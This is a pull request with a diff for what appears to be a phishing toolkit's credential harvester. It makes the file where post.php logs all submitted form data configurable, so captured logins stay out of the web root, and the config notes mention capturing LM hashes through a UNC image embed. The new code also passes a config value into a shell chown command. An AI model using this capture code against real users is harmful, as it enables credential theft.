### PR TITLE
Attempt to make the harvester log file configurable.

### DIFF
--- a/config/set_config
+++ b/config/set_config
@@ -189,6 +189,10 @@ AUTO_REDIRECT=ON
 ### TO CHANGE.
 HARVESTER_REDIRECT=OFF
 HARVESTER_URL=http://thishasnotbeenset
+### This sets destination for the harvester log file if Apache is used. If left empty, it savest log to
+### timestamped log next to generated post.php file. If you change this, make sure that Apache user
+### (typically "www-data") has permissions to write to this file!
+HARVESTER_LOG=
 #
 ### This feature will auto embed a img src tag to a unc path of your attack machine.
 ### Useful if you want to intercept the half lm keys with rainbowtables. What will happen

--- a/config/update_config.py
+++ b/config/update_config.py
@@ -69,6 +69,7 @@ def value_type(value):
             'AUTO_REDIRECT':False,
             'HARVESTER_REDIRECT':False,
             'HARVESTER_URL':True,
+            'HARVESTER_LOG':True,
             'UNC_EMBED':False,
             'ACCESS_POINT_SSID':True,
             'AIRBASE_NG_PATH':True,

--- a/src/webattack/harvester/harvester.py
+++ b/src/webattack/harvester/harvester.py
@@ -429,14 +429,17 @@ def run():
         print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
         print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
         print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
-        filewrite = file("%s/post.php" % (apache_dir), "w")
         now=datetime.datetime.today()
-        filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % (now))
+        log_file = check_config("HARVESTER_LOG=")
+        if not log_file:
+            log_file = '%s/harvester_%s.txt' % (apache_dir, now)
+        filewrite = file("%s/post.php" % (apache_dir), "w")
+        filewrite.write("""<?php $file = '%s';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?>""" % log_file)
         filewrite.close()
-        filewrite = file("%s/harvester_%s.txt" % (apache_dir,now), "w")
+        filewrite = file(log_file, "w")
         filewrite.write("")
         filewrite.close()
-        subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_dir,now), shell=True).wait()
+        subprocess.Popen("chown www-data:www-data '%s'" % log_file, shell=True).wait()
         # here we specify if we are tracking users and such
         if track_email.lower() == "on":
             fileopen = file (setdir + "/web_clone/index.html", "r")


### PR DESCRIPTION
Here is a quick attempt to make the harvester log file destination configurable to mitigate the fact that the logfile is typically stored in /data/www where it could be fetched from via web browser (if someone knew, guessed or bruteforced the right timestamp)
